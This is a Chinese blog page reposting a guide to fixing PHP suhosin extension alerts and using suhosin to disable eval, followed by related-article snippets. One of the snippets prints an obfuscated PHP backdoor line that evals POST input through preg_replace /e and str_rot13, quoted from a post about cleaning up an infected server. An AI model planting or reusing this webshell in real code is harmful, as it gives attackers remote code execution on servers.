php 扩展 suhosin 配置不当引发的报错及其解决方法

最新推荐文章于 2021-11-03 15:31:18 发布
最新推荐文章于 2021-11-03 15:31:18 发布
阅读量572 收藏
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/hjqjk/p/5712830.html
版权

1、

/var/log/messages 频繁报错:

Jul 24 03:27:04 localhost suhosin[9115]: ALERT - script tried to increase memory_limit to 524288000 bytes which is above the allow
ed value (attacker '14.215.58.244', file '/home/www/bbsphp/index.php', line 2)

查看/home/www/bbsphp/index.php,发现有以下语句:

ini_set("memory_limit","500M");

 

查看php.ini :

# grep 'suhosin.memory_limit' /usr/local/php/etc/php.ini 
suhosin.memory_limit = 128M

解决方法:

修改php.ini :

suhosin.memory_limit = 640M  或  memory_limit = 640M

 

2、

/var/log/messages 频繁报错:

Jul 27 21:31:04 localhost suhosin[5308]: ALERT - configured request variable name length limit exceeded - dropped variable 'Mozill
a/5_0_(iPhone;_CPU_iPhone_OS_9_3_2_like_Mac_OS_X)_AppleWebKit/601_1_46_(KHTML,_like_Gecko)_Mobile/13F69;com_chw_appking/18touch_com/tq3_0/dis:AppStore:1_5' (attacker '175.44.219.89', file '/home/www/index.php')

 

解决:

在php.ini的 [suhosin] 下添加以下三行:

suhosin.request.max_varname_length = 1024
suhosin.get.max_name_length = 1024
suhosin.post.max_name_length = 1024

 

suhosin配置,官方说明:http://www.suhosin.org/stories/configuration.html

 

3、禁止eval函数

网上说使用disable_functions 禁止掉eval函数,但是这种禁止是无法生效的。
php的eval函数并不是系统组件函数,因此我们在php.ini中使用disable_functions是无法禁止它的。

 

那么php怎么禁止eval呢?

如果想禁掉eval可以用php的扩展 Suhosin

1、安装Suhosin扩展
2、在php.ini中加入:extension=suhosin.so
3、在加上:suhosin.executor.disable_eval = on
4、重启php-fpm服务

注意,当禁止eval函数后,有些系统会出现以下错误:

Fatal error: SUHOSIN - Use of eval is forbidden by configuration in /home/wp-includes/classes.php(219) : eval()'d code on line 219

 

转载于:https://www.cnblogs.com/hjqjk/p/5712830.html

weixin_34245169
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
suhosin7:适用于 PHP 7.x 的 Suhosin 扩展
05-30
suhosin7 警告:本软件是 ALPHA 前的软件。 不要试图在生产中运行 PHP 7.3 支持和 snufflepagus 对于支持 PHP 7.3 的合适 Suhosin7 替代品,请查看 未来计划 (2019) 和 Suhosin-NG Suhosin7开发已经暂停了一段时间。 但在那段时间里,很多关于如何提高 PHP 安全性的想法浮现在脑海中。 计划根据 snufflepagus 所做的出色工作来探索其中的一些想法。
phpsuhosin扩展安装suhosin-github主分支包
10-18
php安装suhosin扩展
Suhosin配置参数
xuyaqun的专栏
02-21 2937
参考http://www.hardened-php.net/suhosin/configuration.htmlConfigurationSuhosin‘s features are all configured through the php.ini configuration file. Here you can find descriptions of all s
php安装suhosin扩展
weixin_41532254的博客
10-17 651
安装suhosin扩展 [root@lxk ~]# wget https://github.com/sektioneins/suhosin/archive/master.zip [root@lxk ~]# unzip master.zip [root@lxk ~]# cd suhosin-master/ [root@lxk suhosin-master]# which phpize /usr/bin/phpize [root@lxk suhosin-master]# rpm -qf /usr/bin/ph
php扩展suhosin,PHP扩展--Suhosin保护PHP应用系统
weixin_42516830的博客
03-22 294
什么是SuhosinSuhosin是一个PHP程序的保护系统。它的设计初衷是为了保护服务器和用户抵御PHP程序和PHP核心中,已知或者未知的缺陷。Suhosin有两个独立的部分,使用时可以分开使用或者联合使用。第一部分是一个用于PHP核心的补丁,它能抵御缓冲区溢出或者格式化串的弱点;第二部分是一个强大的PHP扩展,包含其他所有的保护措施。下载安装补丁##高版本不需要,折中选择是否打补丁wget ...
中木马了
余璜的技术博客
11-20 1629
服务器中了木马,代码如下: ($b4dboy = $_POST['aaa']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add'); 原理: 这段代码将post进来的数据直接调用eval执行。 解决方案: 看来得把eval禁用掉了。
php_suhosin.dll
08-27
windows下安装suhosin: 1、安装suhosin,将php_suhosin.dll文件复制到php目录下 2、编辑php.ini extension=php_suhosin.dll suhosin.executor.disable_eval = on 3、重启php服务,完成php保护,实现eval(&#...
php5.x禁用eval的操作方法
12-18
幸好有前辈提供了php扩展来禁用万恶的eval: suhosin 一开始发现是需要给php打补丁,我是拒绝的,但确实没有找到更好的方法。不过实际安装下来,真的很方便: yum install wget make gcc gcc-c++ zlib-devel ...
VladGh.com-LEMP:最新的NginX,MySQL,PHP(带有APC和Suhosin
02-23
该脚本将安装最新的NginX,MySQL和PHP(具有APC和Memcache扩展)。 *注意APC不适用于PHP 5.5+。 (可选)您可以安装Memcached服务器和Postfix。 您可以为任何程序安装首选版本。 只需编辑OPTIONS文件并进行相应...
php禁用eval如何渗透,php怎样禁用eval_后端开发
weixin_42514107的博客
03-17 139
php禁用eval的要领:1、装置编译东西;2、装置suhosin;3、设置php支撑suhosin;4、编辑phpinfo.php设置文件,修正设置【suhosin.executor.disable_eval = on】即可。 具体要领:(引荐教程:php图文教程)1、装置编译东西yum install wget make gcc gcc-c++ zlib-devel openssl open...
前端项目打包出现JavaScript堆内存不足、启动也会内存溢出解决办法\increase-memory-limit‘ 不是内部或外部命令,
tangdou369098655的博客
07-08 4672
打包出现JavaScript堆内存不足 最近打包遇到这种 Ineffective mark-compacts near heap limit Allocation failed - JavaScript heap out of memory 以及 FATAL ERROR: CALL_AND_RETRY_LAST Allocation failed - JavaScript heap out of memory 解决方法如下: 1.从网上搜索的资料试了一下,不大好用,不过也照做了 修改 package
increase-memory-limit 解决 项目运行内存不足(JS stack trace)
晴天有点孤单
11-03 3392
项目运行过程中发现内存不够? <— JS stacktrace —> ==== JS stack trace ========================================= 试试下面的命令吧 npm install -g increase-memory-limit increase-memory-limit
python中误useofeval_Python中的eval
weixin_39946534的博客
12-20 493
本文最后更新于2015年8月2日,已超过 1 年没有更新,如果文章内容失效,还请反馈给我,谢谢!缘由:在Freebuf上看到的两篇文章:Python eval的常见误封装及利用原理、Python安全编码与代码审计,里面涉及到了对Python的eval函数的说明和讲解,之后我又去网上搜了一些资料,整理成了这篇文章。搜索关键字:python eval literal_eval参考链接:# Pytho...
php.ini常见设置
电商/游戏/数据采集/数据统计
06-08 140
ini_set('max_execution_time',1000); set_time_limit(3000); ini_set('display_errors','On'); ini_set('memory_limit','500M');  
suhosin php,使用Suhosin保护您的PHP环境!——安装Suhosin
weixin_42501035的博客
03-12 563
一、简介如今,建站已经不再是难事了,各种一键安装包,随处可见…就比如说军哥的LNMP和LNMPA,以及老外的XAMP和LAMP…但是呢,环境搭建变得简单了,环境的安全却容易被人忽略,昨天,我就在百度上搜索了一下…前前后后10多页都是LNMP安装包的安装完成收录,其中还有许多居然可以打开…可见其安全意识…那么php.ini的设置更不用说了…估计就是安装好就开始用…至于那些什么转义什么的估计看都不看…...
使用Suhosin保护PHP应用系统(禁用eval)
whatday的专栏
03-01 6127
一、什么是Suhosin?         Suhosin是一个PHP程序的保护系统。它的设计初衷是为了保护服务器和用户抵御PHP程序和PHP核心中,已知或者未知的缺陷。Suhosin有两个独立的部分,使用时可以分开使用或者联合使用。第一部分是一个用于PHP核心的补丁,它能抵御缓冲区溢出或者格式化串的弱点;第二部分是一个强大的PHP扩展,包含其他所有的保护措施。   二、下载地址
PHP 安装 diseval 扩展 禁用eval()
qq_39004843的博客
10-20 1143
为什么要安装?eval是一个语言构造器而不是一个函数,不能被disable_functions禁止 步骤: 1.安装php-dev 如果是ubuntu/debian系统,使用:(注意PHP版本) # PHP5 sudo apt-get install php-dev # PHP7 sudo apt-get install php7.0-dev 如果是redhat/centos/fedora系统,使用: yum install php-devel 2.下载PHP_diseval_extension git
ctf php反序列化
最新发布
06-07
CTF中的PHP反序列化攻击主要针对使用PHP的Web应用程序,攻击者可以利用PHP反序列化漏洞来执行恶意代码或者获取敏感信息。...此外,还可以使用专门的安全框架来防止这种攻击,比如PHPSuhosin扩展

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值